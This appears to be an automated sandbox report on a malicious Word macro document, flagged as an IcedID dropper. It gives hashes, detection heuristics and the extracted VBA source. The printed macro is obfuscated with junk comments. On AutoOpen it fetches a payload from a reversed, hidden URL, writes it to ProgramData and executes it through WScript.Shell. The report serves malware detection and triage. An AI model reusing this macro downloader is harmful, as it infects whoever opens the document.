Office (OOXML) malware analysis — malicious · 6d6ba9ab72ba94e6

MALICIOUS

Office (OOXML)

140.4 KB Created: 2020-10-13 10:52:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: a1d96ea2c0f9b4d0ad6084f143b31b2b SHA-1: 71a988b9c72f3e1790aee730cf7ab8f5e8d9f527 SHA-256: 6d6ba9ab72ba94e693e8b0e9b134638e0d2f230243a4cbedf1279ad655bbb813

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set BAlSR = CreateObject("Script" + BhVUl)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	11818 bytes
SHA-256: `16bc69d20cb3c685272412d4681a875564152369eba937327ad61280dfb073c2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "pkXkO" Sub UMSdl(IRxAv, Optional ByVal fsBFk As String = "c:\programdata\VqlOy.txt", Optional ByVal BhVUl As String = "ing.FileSystemObject") ' Pascal bonbons pawned licences ' Addictiveness painstaking propellers sundries ' Souring handcart scoundrels ' Along cloudiest dozier bingo ejections ' Graters golfer employable ' Soften determined ' Microbial antiabortionists lingerer cypress ' Irreproachably ' Sadist dismissals ' Campsite sublimes ' Subtractive yeas ' Loyal prototypes ' Respectively leisure adios resonant ' Sucker tack hallowed meagre doubled ironlady ' Effeminacy Set BAlSR = CreateObject("Script" + BhVUl) ' Deskilling python ' Roamed reschedule ' Deserve chiming ' Tori casements sheep amphibians ' Crazy briskness Set LQXuQ = BAlSR.CreateTextFile(fsBFk) ' Overwrote disrobing revive renumber ' Indicted compressions ' Insanities madams oddjob ' Firebox skimming slowest ostriches ' Flukey crystallisation archetypical shrieks intercessions ' Rowdiest ' Amazingly sympathised declarers superimposition fastings ' Flurried creeks extinguishment knuckledusters LQXuQ.WriteLine IRxAv ' Caramels coefficient ' Reassess ' Glossiest reprieved ' Hydrogen ' Spectroscopically gongs sluiced snoopy LQXuQ.Close ' Blasphemer crowed knuckles ebony dilator progressively ' Newcomer float unjustifiable masculine ' Declaim pits fives infidels ' Storekeepers collage welltodo malformation ' Borderline mouthed veracity paddock ' Chicanery propulsion leprechaun possessive ' Previously ' Gazebo ' Smoothing campanological lavender ' Compasses showdown ' Faintly gelatinous sympathisers ' Surviving lamina prick fuddles ' Hydrants sensing conscripts infuriated misogynists marketable ' Oeuvre conman priest ' Tingliest ' Pele swashbuckling teeniest smallish tweak ' Assailable renter stressed brocaded compromises ' Pastels choicest format ' Mullet diacritical ' Mousey ids impersonated negligence lighters ' Acclamations distinct implemented admirals ' Undercut profanely ' Prayer receipt cosmetics objects fragrance ' Spokesman disbelievers ' Sicily melatonin bid ' Siphons swiped fanatics hazarded ' Competency concatenations circuitous husbandman volatility ' Toeing blockbusters ' Vibrator purveyed storeroom ' Mistrusted sniffing ' Strafe immunities ' Kebabs midfielders retrieve ' Shear icebergs ' Unfaithfulness smilingly imbecilic crunchy ' Conservations finnish galileo blackout ends vigil ' Petrified feud stinged civilities eyeglass ' Categorises hour cottages ' Overhauls ' Calorimetry pale payable voter dishwashers End Sub ' Hail ' Muddier sponsorship unbent conjurors clutch vortexes ' Schoolmates inanity ' Breezed draining retort ' Isomorphism rummage deplete blockbusters ' Incidentally quipper gametes Sub AutoOpen() ' Pathology storage cuff subscribes ambled masthead plover ' Intriguingly liaising asian potters leone architectonic ' Apparently amphetamines ' Nourished berths biochemical powerless harboured ' Snored ' Hardware disarmingly ' Flung polytheism stags gorge ' Easily streetwise ' Enable eternity happiness ' Proximal resurgence literatures chafe ' Chiefly chesterfield ' Community arguer neutralist magnifies deposition convinces ' Curia ' Geniality hoarding ' Puller equations gabble ' Righting ' Renegotiation sterilise sniffed dually ' Terse ' Gurgling undeterred ' Prismatic logs fishers ladybird discipline ' Relight ' Risks secretiveness wails ' Jeeringly reiteration job ' Motivations requisitioning ' Humiliates ' Agonies oxides ' Contralto bemoan coldly van ' Stalwart indicting thrombosis cognitive ' Oboe announcement Dim ZKxqU As New agYHw ' Naming chronometer ' Hornpipe cousinly obeying ' Inscribed inferno ' Conjuring valuers fomented ' Parameter oast IRxAv = ZKxqU.usTTN("MSXML2.serverXMLHTTP") ' Equivocating haphazard chuffed naughtiness pecking potter ' Unforgettable distress physiology ' Electrocardiogram subsequent graveyards snowbound bylaws ' Resemblances gosling nogging curative ' Apathetically muscadel doornail UMSdl fRpuN(IRxAv) ' Workpieces avalanches twining ' Inconsiderate elopes impersonated ' Antelopes vulgar swastikas ' Relations corner prevaricating musketeers solemn lute ' Extinctions janitor flutes ' Tucker july cantered award ' Spotlight lumped enchantingly molester ' Mechanised oxygenated palpitation circumlocutory ' Millet wcXTS zASTd(0) + "vr32 c:\programdata\VqlOy.txt", "ws" End Sub Function MGcKG(XLzVL, ZdbRh) ' Foulest schoolmistress upbraid newly incisions ' Sideshows skip parallelism ploys ' Puma ' Overreacts eatings undergrounds constrictive specifics wheelbarrows ' Predation portmanteau manoeuvrability heathenism ' Surmised ' Terminates patriarchs differentiate grips MGcKG = Split(XLzVL, ZdbRh) End Function Attribute VB_Name = "cILzf" ' Diocesan mossier layperson rulers ' Ports agglutinative ' Pelvises conifer handshakes decoder ' Monomeric maker stellated ' Brokenly photogenic rhetoricians displays converging ' Pulse opinion movement overfly imprisonment Function fRpuN(Jkhgf) ' Policewomen ' Dismounts itemised ' Unsuited winkers carsick balm ' Does ' Gadded margarine calculates liveable fRpuN = StrConv(Jkhgf, vbUnicode) ' Polonaises expectancies inquisitiveness testability ' Tokenism helpless ' Stamp ' Sludge pushes presuming sycamores ' Cupidity yeas End Function ' Printouts giftware fervent deciding ' Trapper untwist priorities ' Reals cavalrymen bikinis ' Tuner ' Acquisition happily Function oNXZc() ' Irradiation bungled desirability hailstone perioperative ' Wonderland ' Woodpecker watchful ' Idle unprofitably amphitheatres strutting ' Unfavourably trumps soandso ' Wasted brighton sexier impiety ' Horticulturist whining byelaw herb bucks ' Subsection ooze imploring ' Pityingly jasmine upstarts ' Bing apologies unpick glaucoma filler explains ' Circuses whoops review stalked ' Dispute intentioned oversight With ActiveDocument.shapes(1) oNXZc = .AlternativeText End With End Function ' Unprecedentedly courtiers ' Authentication skydived booed ' Peculiarities paramount sniffer venerable ' Conspirators grammar Function zASTd(amMsd) ' Optimally onuses ' Zany surcharges crags daybreak boney ' Nesting skittles aeon caviare ' Libertarianism ' Guy ' Calvin accountability ' Synonymously canisters ' Something ' Careering requited whipping ' Bungling deleter chop meditatively uproar intermittently ' Platens fount cultivated ' Demeanour credibility razing evBIW = oNXZc() wmzfI = MGcKG(evBIW, "###") bAFIb = wmzfI(amMsd) zASTd = bAFIb End Function Attribute VB_Name = "agYHw" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Reactions plazas ' Censured crumb unless compile ' Routes nauseated ' Catastrophes lucky dowdier radiated speculatively sightless ' Tab ' Chameleons satiate heavyduty Function usTTN(PgHUm) ' Sextants birthmark tastelessly ' Bamboozle symptomatically teaparty ' Footprint peartrees plops dichotomy ' Sicilian thong scaring Dim EpmzR As Object ' Dexterity constructions especial ' Pacific decompressed disallows redistribute exorcist ' Reveller india ' Renouncement commander fugues forelock ' Valueadded resilience salem ' Install alludes preponderantly ' Tracers formalised gloomful banners ' Engagements cannibalistic bated whipper ' Quotidian accelerate lecher boa manages ' Seated aspersions ' Pleasing salons ' Shrinkable beck shoguns olm barbiturate minedetector rolling bloodletting Set EpmzR = CreateObject(PgHUm) ' Shortfalls highlighter ' Ongoing ligaturing concocted mullioned beryllium ' Slovenia ' Detectability baker knifes unfriendly ' Offcuts clientele ' Errant epoxies valueformoney extensiveness ' Mailmen ' Gunpowder indirect ' Wigwams volcanism aces drawers ' Chunk yarn ' Compel familiarising hippodrome ' Conceivability recompensed tonsil penetrative boar befits ' Chancery recalling ' Airlifts ' Absorptivity adrenaline ' Sublimation bedded ho ' Climbs raggedly midfielder explorable injects ' Fleetly ayurvedic barbels ' Radishes quells proxy explicit ' Retied sightless punchbowl ' Giddy microcomputer paramour ' Antral ' Teepee ivories agrochemical pimple XFDPa = zASTd(1) ' Shanks wholegrain playfully ' Heave reversal umpteenth ' Prat minerals voracity neutrals ulster ' Oldmaids pall reeling ' Contrivances coursework EpmzR.Open "GET", Reverse(XFDPa), False ' Adulatory einstein firmer convocation six bluer dikes ' Remembering intimidates successions ' Gassing blacken philanthropist supersede nodule wired ' Corals intricacies ' Incoherency hearable ' Movable EpmzR.Send ' Despairing umpiring irascibly liquids ' Orators bedsheets charwoman bedder ' Pageant winded ogled ' Niggle pings ' Whiskies earlier infirmities sulk ' Secondrate usTTN = EpmzR.responsebody End Function Attribute VB_Name = "UpQZP" Sub wcXTS(oStUc, kaoEZ) ' Cocked ' Mouldiest comedian breeder ' Arab coordinates ' Detesters ' Nigeria beermats ' Cocking ' Dispatch garters imitative Set xmrZr = CreateObject(kaoEZ + "cript.shell") ' Stammers ladyships everincreasing mineral welltimed delaying searcher ' Trusted admiral ' Tawny programmes apprise homophobia thieves likelihood mouselike ' Whereby aitches taxicab coprocessors ' Antique ' Satsumas eurydice burials unbroken terror ' Patrician monster termini ' Hymn impeccably sunrise naturalistic ' Autocrats misprints fixedly dolphinarium ' Squared unmemorable selfportrait unswerving exports ' Cycads irreversibly sprawling ' Refuels vulgarity excised hypothetical ' Litchi glass thalamus precipitate quarts shortcircuit ' Crispier punishing horsebox ' Hydrangea impeding volleys oilmen ' Algal minefields ' Discussions ' Feelers ' Wholesome spotlessly exoskeleton destructive ' Lens unevenly mechanised hopper discomfited blackball ' Raw baby misanthropes ' Dustily ' Discontinuities strands ' Funerary vests electability ' Rumania aloe ' Perceptibly sturgeon imprint tease ' Snoozing respectfully franked ' Autopsies lease carcinoma versatile ' Passives marmots underlay ' Auctioning ' Flawed houses malt ' Fumigate ' Slashing gadgets selfdestructing valuers ' Fleeting ' Stoneless prime resetting reneging niagara ' Flub gluon gluey bonnets spurge ' Bureaucracy impracticalities bloomy ' Misprints pall ' Engines frailest shorted sawn psychiatrists ' Plundered gruff ' Lexicons necessarily ' Within paella scoreline gritty maintainable literacy ' Ecosystems headers misinterprets ' Interspersed broadsides penitent genoa ' Kingsize drums campuses limelight ' Intro ' Seismologists magnitudes scroll ' Stooges dexterous export xmrZr.exec oStUc ' Arcaneness stiffness abominably ' Brazil overlaid ' Eleventh ' Gurgle newsmen deletions republish ' Teetotaller kilns spade depot ' Colourblind jacking dykes emptily thoughtfully sincerity ' Stinger evaluates hankering cyprians End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	45056 bytes
SHA-256: `e841efede6aa44559fb7a55f51c93732beb666c3a552032707e78c533bb60dec`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.